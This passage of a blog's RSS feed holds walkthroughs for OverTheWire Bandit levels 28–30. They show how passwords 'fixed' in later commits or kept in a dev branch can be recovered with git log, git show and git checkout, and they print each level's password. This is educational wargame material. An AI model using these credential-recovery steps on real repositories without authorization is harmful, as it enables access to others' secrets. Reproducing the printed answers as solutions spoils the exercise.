Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN</span><br></span></code></pre></div></div>
<p><code>&lt;!-- truncate --&gt;</code></p>]]></content:encoded>
            <category>bandit</category>
            <category>overthewire</category>
            <category>cybersecurity</category>
            <category>git</category>
        </item>
        <item>
            <title><![CDATA[Bandit Level 28 → 29]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-28-29</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-28-29</guid>
            <pubDate>Sun, 12 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Login: ssh bandit28@bandit.labs.overthewire.org -p 2220]]></description>
            <content:encoded><![CDATA[<p><strong>Login:</strong> <code>ssh bandit28@bandit.labs.overthewire.org -p 2220</code><br>
<strong>Password:</strong> <code>Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN</code></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="task">task<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-28-29#task" class="hash-link" aria-label="Direct link to task" title="Direct link to task" translate="no">​</a></h3>
<p>There is a git repository at <code>ssh://bandit28-git@bandit.labs.overthewire.org:2220/home/bandit28-git/repo</code>. The password for the user <code>bandit28-git</code> is the same as the password for the user <code>bandit28</code>. Clone the repository and find the password for the next level.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="theory-lil-bit">theory lil bit<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-28-29#theory-lil-bit" class="hash-link" aria-label="Direct link to theory lil bit" title="Direct link to theory lil bit" translate="no">​</a></h3>
<ol>
<li class=""><strong>Git History</strong>: Git stores a snapshot of every change made to a file. Even if sensitive data is overwritten or deleted in the latest version, it remains accessible in the project's history.</li>
<li class=""><strong>Git Log</strong>: The <code>git log</code> command displays a list of all commits made to the repository, showing the commit hash, author, and descriptions like "fix info leak."</li>
<li class=""><strong>Git Show</strong>: This command is used to view the specific changes (diff) introduced in a particular commit. It highlights what was added (<code>+</code>) and what was removed (<code>-</code>).</li>
<li class=""><strong>Data Sanitization</strong>: This level highlights the danger of committing secrets. Simply "fixing" an info leak with a new commit doesn't remove the secret from the underlying <code>.git</code> directory.</li>
</ol>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="solution">solution<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-28-29#solution" class="hash-link" aria-label="Direct link to solution" title="Direct link to solution" translate="no">​</a></h3>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Clone the repository into your workspace</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ git clone ssh://bandit28-git@bandit.labs.overthewire.org:2220/home/bandit28-git/repo</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Cloning into 'repo'...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit28-git@bandit.labs.overthewire.org's password: </span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Navigate to the repository and check the current file</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ cd repo</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ cat README.md</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Bandit Notes</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">- password: xxxxxxxxxx</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Inspect the commit history to find where the "info leak" occurred</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ git log</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">commit 00daa614aac60bd2981c381484191eb7bc4dcfd9 (HEAD -&gt; master)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Author: Morla Porla &lt;morla@overthewire.org&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">    fix info leak</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">commit a1487fd098591dfa210ede70ba60f7093f47d20d</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">    add missing data</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># View the changes in the 'fix info leak' commit to see the original password</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ git show 00daa614aac60bd2981c381484191eb7bc4dcfd9</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">- password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">+ password: xxxxxxxxxx</span><br></span></code></pre></div></div>
<p><code>&lt;!-- truncate --&gt;</code></p>]]></content:encoded>
            <category>bandit</category>
            <category>overthewire</category>
            <category>cybersecurity</category>
            <category>git</category>
        </item>
        <item>
            <title><![CDATA[Bandit Level 29 → 30]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-29-30</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-29-30</guid>
            <pubDate>Sun, 12 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Login: ssh bandit29@bandit.labs.overthewire.org -p 2220]]></description>
            <content:encoded><![CDATA[<p><strong>Login:</strong> <code>ssh bandit29@bandit.labs.overthewire.org -p 2220</code><br>
<strong>Password:</strong> <code>4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7</code></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="task">task<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-29-30#task" class="hash-link" aria-label="Direct link to task" title="Direct link to task" translate="no">​</a></h3>
<p>There is a git repository at <code>ssh://bandit29-git@bandit.labs.overthewire.org:2220/home/bandit29-git/repo</code>. The password for the user <code>bandit29-git</code> is the same as the password for the user <code>bandit29</code>. Clone the repository and find the password for the next level.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="theory-lil-bit">theory lil bit<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-29-30#theory-lil-bit" class="hash-link" aria-label="Direct link to theory lil bit" title="Direct link to theory lil bit" translate="no">​</a></h3>
<ol>
<li class=""><strong>Git Branches</strong>: Repositories often have multiple branches (e.g., <code>master</code>, <code>dev</code>, <code>staging</code>). The default branch might not contain the sensitive data you are looking for.</li>
<li class=""><strong>Remote Branches</strong>: Use <code>git branch -a</code> to see all branches, including those that exist on the remote server but haven't been checked out locally yet.</li>
<li class=""><strong>Switching Context</strong>: The <code>git checkout [branch_name]</code> command allows you to switch between these different versions of the project's codebase.</li>
<li class=""><strong>Information Siloing</strong>: Developers often keep "production" branches clean while leaving credentials or debugging code in "development" or "test" branches.</li>
</ol>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="solution">solution<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-29-30#solution" class="hash-link" aria-label="Direct link to solution" title="Direct link to solution" translate="no">​</a></h3>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Clone the repository</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ git clone ssh://bandit29-git@bandit.labs.overthewire.org:2220/home/bandit29-git/repo</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Cloning into 'repo'...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit29-git@bandit.labs.overthewire.org's password: </span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Navigate and check the default README (password is redacted)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ cd repo</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ cat README.md</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">- password: &lt;no passwords in production!&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Check all available branches (local and remote)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ git branch -a</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* master</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  remotes/origin/HEAD -&gt; origin/master</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  remotes/origin/dev</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  remotes/origin/master</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  remotes/origin/sploits-dev</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Switch to the 'dev' branch to see if it contains different data</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ git checkout dev</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">branch 'dev' set up to track 'origin/dev'.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Switched to a new branch 'dev'</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Check the README.md in the 'dev' branch</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ cat README.md</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Bandit Notes</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Some notes for bandit30 of bandit.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">## credentials</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">- username: bandit30</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL</span><br></span></code></pre></div></div>
<p><code>&lt;!-- truncate --&gt;</code></p>]]></content:encoded>
            <category>bandit</category>
            <category>overthewire</category>
            <category>cybersecurity</category>
            <category>git</category>
        </item>
    </channel>
</rss>